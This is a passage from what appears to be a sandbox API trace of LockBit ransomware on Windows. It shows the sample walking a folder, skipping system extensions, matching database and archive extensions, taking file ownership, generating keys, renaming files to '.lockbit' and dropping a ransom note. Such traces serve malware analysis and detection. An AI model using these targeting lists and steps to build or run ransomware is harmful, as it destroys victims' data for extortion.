Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\play-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.984] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.984] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.984] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.985] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.985] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.985] RtlFreeAnsiString (AnsiString="\\") [0079.985] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.985] malloc (_Size=0x200) returned 0x77d800 [0079.985] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.985] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.985] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.985] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.986] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.986] CloseHandle (hObject=0x3c4) returned 1 [0079.986] free (_Block=0x77d800) [0079.986] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\play-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.986] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.986] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.986] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=1285) returned 1 [0079.986] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.987] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.987] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.987] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.987] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.015] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.015] malloc (_Size=0xb0) returned 0x1ff1e60 [0080.015] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb0, FileInformationClass=0xa) returned 0x0 [0080.015] free (_Block=0x1ff1e60) [0080.015] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0080.015] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0080.016] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.016] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72ae0342, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72ae0342, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5ea6a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x505, dwReserved0=0x0, dwReserved1=0x0, cFileName="play-static.png", cAlternateFileName="")) returned 0 [0080.016] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0080.016] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ecb0968, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ecb0968, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5ea6a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1276, dwReserved0=0x520150, dwReserved1=0x0, cFileName="BlackRectangle.bmp", cAlternateFileName="")) returned 1 [0080.016] lstrcmpiW (lpString1=".", lpString2="BlackRectangle.bmp") returned -1 [0080.016] lstrcmpiW (lpString1="..", lpString2="BlackRectangle.bmp") returned -1 [0080.016] PathFindExtensionW (pszPath="BlackRectangle.bmp") returned=".bmp" [0080.016] lstrcmpiW (lpString1=".386", lpString2=".bmp") returned -1 [0080.016] lstrcmpiW (lpString1=".cmd", lpString2=".bmp") returned 1 [0080.016] lstrcmpiW (lpString1=".exe", lpString2=".bmp") returned 1 [0080.016] lstrcmpiW (lpString1=".ani", lpString2=".bmp") returned -1 [0080.016] lstrcmpiW (lpString1=".adv", lpString2=".bmp") returned -1 [0080.016] lstrcmpiW (lpString1=".theme", lpString2=".bmp") returned 1 [0080.016] lstrcmpiW (lpString1=".msi", lpString2=".bmp") returned 1 [0080.016] lstrcmpiW (lpString1=".msp", lpString2=".bmp") returned 1 [0080.016] lstrcmpiW (lpString1=".com", lpString2=".bmp") returned 1 [0080.016] lstrcmpiW (lpString1=".diagpkg", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".nls", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".diagcab", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".lock", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".ocx", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".mpa", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".cpl", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".mod", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".hta", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".icns", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".prf", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".rtp", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".diagcfg", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".msstyles", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0080.017] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".shs", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".drv", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".wpx", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".bat", lpString2=".bmp") returned -1 [0080.017] lstrcmpiW (lpString1=".rom", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".msc", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".spl", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".ps1", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".msu", lpString2=".bmp") returned 1 [0080.017] lstrcmpiW (lpString1=".ics", lpString2=".bmp") returned 1 [0080.018] lstrcmpiW (lpString1=".key", lpString2=".bmp") returned 1 [0080.018] lstrcmpiW (lpString1=".mp3", lpString2=".bmp") returned 1 [0080.018] lstrcmpiW (lpString1=".reg", lpString2=".bmp") returned 1 [0080.018] lstrcmpiW (lpString1=".dll", lpString2=".bmp") returned 1 [0080.018] lstrcmpiW (lpString1=".ini", lpString2=".bmp") returned 1 [0080.018] lstrcmpiW (lpString1=".idx", lpString2=".bmp") returned 1 [0080.018] lstrcmpiW (lpString1=".sys", lpString2=".bmp") returned 1 [0080.018] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0080.018] lstrcmpiW (lpString1=".ico", lpString2=".bmp") returned 1 [0080.018] lstrcmpiW (lpString1=".lnk", lpString2=".bmp") returned 1 [0080.018] lstrcmpiW (lpString1=".rdp", lpString2=".bmp") returned 1 [0080.018] lstrcmpiW (lpString1=".lockbit", lpString2=".bmp") returned 1 [0080.018] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BlackRectangle.bmp") returned 1 [0080.018] lstrcmpiW (lpString1="ntldr", lpString2="BlackRectangle.bmp") returned 1 [0080.018] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BlackRectangle.bmp") returned 1 [0080.018] lstrcmpiW (lpString1="bootsect.bak", lpString2="BlackRectangle.bmp") returned 1 [0080.018] lstrcmpiW (lpString1="autorun.inf", lpString2="BlackRectangle.bmp") returned -1 [0080.018] lstrcmpiW (lpString1="thumbs.db", lpString2="BlackRectangle.bmp") returned 1 [0080.018] lstrcmpiW (lpString1="iconcache.db", lpString2="BlackRectangle.bmp") returned 1 [0080.019] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0080.019] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned=".bmp" [0080.019] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".7z", lpString2=".bmp") returned -1 [0080.019] lstrcmpiW (lpString1=".ckp", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".dacpac", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".db", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".db-shm", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".db-wal", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".db3", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".dbc", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".dbs", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".dbt", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".dbv", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".frm", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".mdf", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".mrg", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".mwb", lpString2=".bmp") returned 1 [0080.019] lstrcmpiW (lpString1=".myd", lpString2=".bmp") returned 1 [0080.020] lstrcmpiW (lpString1=".ndf", lpString2=".bmp") returned 1 [0080.020] lstrcmpiW (lpString1=".qry", lpString2=".bmp") returned 1 [0080.020] lstrcmpiW (lpString1=".sdb", lpString2=".bmp") returned 1 [0080.020] lstrcmpiW (lpString1=".sdf", lpString2=".bmp") returned 1 [0080.020] lstrcmpiW (lpString1=".sql", lpString2=".bmp") returned 1 [0080.020] lstrcmpiW (lpString1=".sqlite", lpString2=".bmp") returned 1 [0080.020] lstrcmpiW (lpString1=".sqlite3", lpString2=".bmp") returned 1 [0080.020] lstrcmpiW (lpString1=".sqlitedb", lpString2=".bmp") returned 1 [0080.020] lstrcmpiW (lpString1=".tmd", lpString2=".bmp") returned 1 [0080.020] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp.lockbit") returned 71 [0080.020] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\blackrectangle.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.024] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.024] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.024] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.025] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.025] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.025] RtlFreeAnsiString (AnsiString="\\") [0080.025] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3b4) returned 0x0 [0080.025] malloc (_Size=0x200) returned 0x77d800 [0080.025] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0080.025] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.025] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.025] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.026] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.026] CloseHandle (hObject=0x3b4) returned 1 [0080.026] free (_Block=0x77d800) [0080.026] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\blackrectangle.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0080.026] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.026] malloc (_Size=0x40068) returned 0x3d70048 [0080.026] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=4726) returned 1 [0080.026] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.027] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0080.027] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.027] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0080.028] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0080.030] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.030] malloc (_Size=0xa4) returned 0x1ff1e60 [0080.030] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xa4, FileInformationClass=0xa) returned 0x0 [0080.030] free (_Block=0x1ff1e60) [0080.030] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0080.030] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0080.030] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.031] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebf2297, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ebf2297, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9679c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6a91, dwReserved0=0x520150, dwReserved1=0x0, cFileName="circleround_glass.png", cAlternateFileName="")) returned 1 [0080.031] lstrcmpiW (lpString1=".", lpString2="circleround_glass.png") returned -1 [0080.031] lstrcmpiW (lpString1="..", lpString2="circleround_glass.png") returned -1 [0080.031] PathFindExtensionW (pszPath="circleround_glass.png") returned=".png" [0080.031] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.031] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.031] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.031] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.032] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.032] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.032] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.032] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.033] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.033] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.033] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.033] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.033] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.033] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.033] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.033] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.033] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.033] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.033] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.033] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.033] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.033] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.033] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.033] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.033] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.033] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.033] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.033] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.033] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.033] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="circleround_glass.png") returned 1 [0080.034] lstrcmpiW (lpString1="ntldr", lpString2="circleround_glass.png") returned 1 [0080.034] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="circleround_glass.png") returned 1 [0080.034] lstrcmpiW (lpString1="bootsect.bak", lpString2="circleround_glass.png") returned -1 [0080.034] lstrcmpiW (lpString1="autorun.inf", lpString2="circleround_glass.png") returned -1 [0080.034] lstrcmpiW (lpString1="thumbs.db", lpString2="circleround_glass.png") returned 1 [0080.034] lstrcmpiW (lpString1="iconcache.db", lpString2="circleround_glass.png") returned 1 [0080.034] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0080.034] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned=".png" [0080.034] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.034] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.034] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.034] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.034] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.034] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.034] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.034] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.034] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.034] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.034] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.034] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.035] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.035] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.035] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.035] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.035] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.035] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.035] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.035] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.035] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.035] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.035] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.035] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.035] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.035] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.035] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.035] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.035] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.lockbit") returned 74 [0080.035] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_glass.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.036] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.036] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.036] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.036] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.037] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.037] RtlFreeAnsiString (AnsiString="\\") [0080.037] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3c0) returned 0x0 [0080.037] malloc (_Size=0x200) returned 0x77d800 [0080.037] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0080.037] 